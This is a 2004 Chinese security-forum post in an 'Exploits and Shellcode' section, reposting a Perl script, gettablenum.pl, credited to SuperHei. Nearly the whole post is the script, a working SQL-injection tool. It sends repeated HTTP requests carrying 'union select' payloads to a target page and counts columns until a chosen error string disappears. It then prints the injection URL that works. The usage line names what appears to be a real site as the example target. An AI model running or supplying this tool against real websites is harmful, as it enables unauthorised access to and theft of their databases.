gettablenum.pl

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 591 小时
注册时间: 2004-6-25
最后登录: 2008-10-12

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-7-15 23:58 只看该作者

gettablenum.pl

文章出处：SuperHei

复制内容到剪贴板

代码:

#!/usr/bin/perl 

#the cody find Table&#39;s No. 

#for union select in (access,mysql,mssql)

#Codz by SuperHei 



use IO::Socket; 



$ARGC = @ARGV; 

if ($ARGC != 4) 

{ 

print "usage:$0 ww3.tty-1.net 808 /newdown/show.php?id=10 mysql_fetch_o\n"; 

exit; 

} 





$host = @ARGV[0]; 

$port =@ARGV[1]; 

$way = @ARGV[2]; 

$judge=$ARGV[3]; 



for ($i=0;$i<100;$i++){ 

$d=",1".$d; 

$path1= "%20union%20select%201"."$d"; 

$req = "GET $way$path1 HTTP/1.0\r\n". 

"Referer: [url]http://$host$way[/url]\r\n". 

"Host:$host\n\n\n\n\n\n\n"; 



@in = sock($req); 

@num=grep /$judge/, @in; 

$size=@num; 

$n=$i+2; 

if ($size > 0) { 

print "The NO. is $n .... Flase!\n" ;} 

else{ 

print "\nThe NO. is $n .... OK!\n" ; 

print "URl: \n$path1";exit; 

} 

} 



sub sock{ 

my ($req) = @_; 

my $connection = IO::Socket::INET->new(Proto =>"tcp", 

PeerAddr =>$host, 

PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; 



print $connection $req; 

my @res = <$connection>; 

close $connection; 

return @res; 

sleep(1); 

}

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » gettablenum.pl